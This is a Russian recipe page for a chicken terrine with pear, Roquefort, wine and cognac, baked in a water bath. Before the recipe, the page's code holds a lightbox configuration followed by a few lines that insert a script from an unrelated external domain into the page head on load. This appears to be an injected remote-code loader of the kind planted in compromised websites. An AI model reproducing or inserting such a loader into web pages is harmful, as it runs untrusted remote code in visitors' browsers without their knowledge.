, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Террин из курицы


terrinfinТеррин — это такое кушанье из мяса или рыбы, которое запекается в прямоугольной формочке и после охлаждения нарезается тонкими ломтиками. Вариаций терринов великое множество. Предлагаю попробовать террин из курицы с грушей и сыром Рокфор.  Блюдо это, по-моему, хорошо употреблять как в горячем, так и в холодном виде.

Чего и сколько берем:

1. куриное филе — 500 гр.

2. сливки (20%) — 150 гр.

3. яйца — 1 шт.

4. Сыр рокфор — 150 гр.

5. Груша — 1 шт.

6. Белое вино — 100 гр.

7. Коньяк — 6 ст. ложек

8. Мед — половину чайной ложки

9. Перец черный

10. Петрушка

Начинаем готовить:

1. Очищаем грушу от кожицы, нарезаем кубиками и припускаем на сковороде  в белом вине, меде, коньяке и сливочном масле

2. Куриное филе измельчаем в блендере с яйцом и сливками, солим и перчим по вкусу

3. Добавляем в куриный фарш припущенную грушу, мелко нарезанную петрушку  и хорошо перемешиваем

4. Выкладываем половину фарша в форму и выкладываем нарезанный кубиками сыр, отступив от краев на 1 см

5. Выкладываем сверху оставшийся фарш

6. Помещаем форму в духовку на 40-50 минут при температуре 160 градусов, поставив в емкость с горячей водой

7. Подавать принято в холодном виде, нарезая на ломтики не более 1 см толщиной

 



Добавить комментарий